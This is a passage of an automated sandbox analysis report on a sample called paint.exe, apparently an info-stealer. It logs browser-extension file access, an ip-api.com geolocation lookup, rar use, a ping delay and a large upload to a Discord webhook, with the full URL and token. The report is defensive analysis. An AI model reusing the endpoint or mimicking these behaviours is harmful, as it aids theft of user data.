              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669826746.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1670514489.0000023393149000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667397043.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668542158.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668318561.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: paint.exe, paint.exe, 00000001.00000002.2016607190.00007FFE007E5000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669527787.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: paint.exe, 00000000.00000003.1670060557.0000023393142000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: paint.exe, paint.exe, 00000001.00000002.2017200622.00007FFE10231000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669612064.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667653632.0000023393141000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669986148.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.0.dr
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: paint.exe, 00000001.00000002.2013861786.00007FFDFAED2000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: paint.exe, 00000001.00000002.2020696017.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669030963.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667295052.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668542158.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.0.dr
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.pdb source: powershell.exe, 0000002F.00000002.1831220495.000001B38AF36000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669696117.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667196677.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: paint.exe, 00000000.00000003.1666671701.0000023393141000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668000364.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: paint.exe, 00000001.00000002.2017457879.00007FFE11511000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: api-ms-win-core-file-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: paint.exe, 00000000.00000003.1668691836.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669231918.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669826746.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669030963.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1666481364.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: paint.exe, 00000001.00000002.2019931710.00007FFE13301000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1666671701.0000023393141000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: paint.exe, 00000001.00000002.2017036529.00007FFE01431000.00000002.00000001.01000000.00000004.sdmp, ucrtbase.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: paint.exe, 00000001.00000002.2017803927.00007FFE11EA1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669986148.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669231918.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: paint.exe, 00000001.00000002.2013426793.00007FFDFAB0F000.00000040.00000001.01000000.00000014.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: paint.exe, 00000001.00000002.2013861786.00007FFDFAF6A000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: paint.exe, 00000001.00000002.2016607190.00007FFE007E5000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: paint.exe, 00000000.00000003.1667071030.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668215242.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: paint.exe, 00000000.00000003.1666481364.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669134321.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: paint.exe, paint.exe, 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669696117.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: paint.exe, paint.exe, 00000001.00000002.2013861786.00007FFDFAF6A000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667397043.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmp, rar.exe, 00000058.00000000.1922631309.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmp
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669612064.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: paint.exe, 00000000.00000003.1670514489.0000023393149000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668921713.0000023393148000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668427752.0000023393148000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: paint.exe
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: paint.exe, 00000001.00000002.2018668375.00007FFE126EB000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667479832.0000023393141000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: paint.exe, 00000001.00000002.2019092977.00007FFE12E11000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667816772.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669915105.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: paint.exe, 00000000.00000003.1668113578.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: paint.exe, 00000001.00000002.2018365437.00007FFE11EC1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669134321.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BD92F0 FindFirstFileExW,FindClose,0_2_00007FF6F0BD92F0
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BD83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6F0BD83B0
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BF18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6F0BF18E4
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BD92F0 FindFirstFileExW,FindClose,1_2_00007FF6F0BD92F0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BD83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF6F0BD83B0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BF18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF6F0BF18E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DF46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,88_2_00007FF623DF46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DEE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,88_2_00007FF623DEE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E388E0 FindFirstFileExA,88_2_00007FF623E388E0
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

              Networking

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: discord.com
              Source: unknownHTTP traffic detected: POST /api/webhooks/1325366706595561574/vQDeUuP3YNG10jqpqcayt14YabeOslGKlq6YRX-VMaSv1X0716_bmr9KcFyMQ8vNYrim HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 728360User-Agent: python-urllib3/2.3.0Content-Type: multipart/form-data; boundary=5504fd0b02b225da5837704d2ec650da
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 05 Jan 2025 09:16:37 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1736068599x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TD8%2FG%2Boni%2BnWwIq8RmUSuAHrutMTwdF2QH58uv%2BCizcFnzmM5qaI1%2BrUWuEisXltQ5GQ6yAgFnPCohw6oWmBtNJO%2BAGl5o8QX8vxChfza9%2FfuxfjkpWiZyakFHdx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=b23ede6a2683bc41436838bfd0b40396a9211394-1736068597; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=WzXRjZZPUtRwjwHI2vQUBHc9MsDw.9t6IlQXS7UdZ5g-1736068597806-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8fd25edcdfaa42db-EWR
              Source: paint.exe, 00000000.00000003.1671769217.000002339314F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
              Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671769217.000002339314F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: paint.exe, 00000001.00000003.2005215252.00000207714D8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781102686.00000207714D3000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1919791436.00000207714D8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1712152844.00000207714D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
              Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671769217.000002339314F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: libcrypto-3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: paint.exe, 00000001.00000003.1680037810.00000207713E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: paint.exe, 00000001.00000002.2008610347.0000020771500000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711380871.0000020771500000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1771294068.00000207714FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: paint.exe, 00000001.00000003.1785051824.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696498061.0000020771927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: paint.exe, 00000001.00000003.2006772338.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711530938.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1785051824.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781796667.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771864000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696746336.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2009946233.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1734071594.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1725063677.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696827300.0000020771892000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2004727333.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 